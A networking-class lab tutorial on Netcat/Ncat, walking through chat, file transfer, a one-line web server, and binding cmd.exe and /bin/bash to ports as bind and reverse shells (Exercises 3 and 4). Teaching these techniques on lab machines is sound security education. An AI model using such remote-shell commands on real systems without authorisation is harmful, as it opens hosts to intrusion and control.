Netcat and Bind Shells

Netcat and Bind Shells Overview

Netcat is a network connection tool that can read and write to TCP and UDP ports. It can make all kinds of network connections that act like a server and a client. It can be a web server, a mail server, a chat server, or any other kind of server. It could be used to transfer files or serve any process even a command shell.

“It is all things, to all people, for all reasons” – Steve Butler.

For this lab exercise install both Netcat and Nmap on two separate computers. Use a Linux computer like CentOS, Mint, Ubuntu, etc., and a computer running Windows 7 or Windows 8.1, Windows 10, etc..

  1. In Linux, install Nmap and Netcat (nmap installs both programs):
    In Centos:
    yum install nmap
        In Mint or Ubuntu:
    sudo apt-get install nmap
  2. In Windows download the Netcat/Ncat program (ncat.exe) and copy it to your C:\\Windows\ folder  ( You may need to whitelist if you are running an antivirus program.
  3. In Windows download and install Nmap at . Use the Latest release self-installer: nmap-7.01-setup.exe

Netcat was created in 1996 and is to this day still considered a great network debugging and testing tool. In 2005 the makers of Nmap created an updated version of Netcat called Ncat that offers additional features like SSL support. Ncat is installed with Nmap for Windows. You can download an updated version of Ncat for Windows at this website: Scroll to the bottom and look for the Windows binary.

sbd is a Netcat clone that offers encryption and runs on Windows or Linux. You can find it and many other netcat related tools here:

A good overview about Netcat:


Exercise 1 – Setup a Netcat connection between two hosts (send text)

  1. Connect to your Windows client (or any network host) and run Netcat.
  2. Copy and paste ncat.exe in your c:\\WINDOWS\ directory so that you will have it available in your command PATH
  3. Open a command prompt. The following command sets Netcat to listen verbosely on port 4444:
    ncat -lvp 4444
  4. Check with Netstat. You should see that Netcat is listening on tcp port 4444.
    netstat -an | FIND “4444”
  5. Go to your Linux client and open a terminal with root access and connect with Netcat on port 4444. If you are using Mint or Ubuntu use a sudo command before ncat:
    ncat <ip address you are connecting to>  4444
  6. You should eventually see an open connection, try type “hello” back and forth between clients.

Exercise 2 – Transfer files using Netcat (pipe to a file)

  1. In Linux use your favorite text editor and type a sentence of text. Save the file as fileshare.txt
  2. In your Windows client type this into the command prompt:
    ncat -lvp 2233 > fileshare.txt
  3. From a Linux terminal type in the following commands (start with sudo if using Mint or Ubuntu):
    ncat <the IP address> 2233 < fileshare.txt
  4. Check your Windows client to see if you received the file.
  5. How would you make the listener (the server) send the file instead of receiving it?

Exercise 3 – Bind a command prompt to a port creating a Bind Shell (the server has a shell listen )

  1. In your Windows client open a command prompt. The following sets cmd.exe to execute on port 7777 when a connection is established:
    ncat -lvp 7777 -e cmd.exe
  2. In your Linux client open a terminal window and connect with Netcat on port 7777 (start with sudo if using Mint or Ubuntu):
    ncat <the ip address to connect to> 7777
  3. If you are successful you will eventually see a Windows command shell in your Linux terminal. You bound a shell (cmd.exe) to a port and served it.

Exercise 4 – Create a reverse Bind Shell (the client sends the shell)

  1. In your Windows client open a command prompt. this sets Netcat to listen on port 7777(server):
      ncat -lvp 7777
  2. In the Linux client terminal the following command executes a bash shell on port 7777 to the listening Netcat server on the Windows client (start with sudo if using Mint or Ubuntu):
    ncat -nv <the ip address> 7777 -e /bin/bash
  3. If you are successful you will receive a shell on the Windows client that you can type bash commands. Try running an ls command. You will not see a # prompt.

Exercise 5 – World’s simplest web server (pipe a html file to a port)

  1. Create or download a simple webpage save it to the current directory and then put this command in a terminal (start with sudo if using Mint or Ubuntu).
    cat index.html | ncat -vl 80
  2. Now on another computer on your network connect to that IP address and view the webpage.

Video Tutorial

In these video tutorials, I execute the lab using BackTrack Linux

Author: Dan

Dan teaches computer networking and security classes at Central Oregon Community College.

Leave a Reply

Your email address will not be published.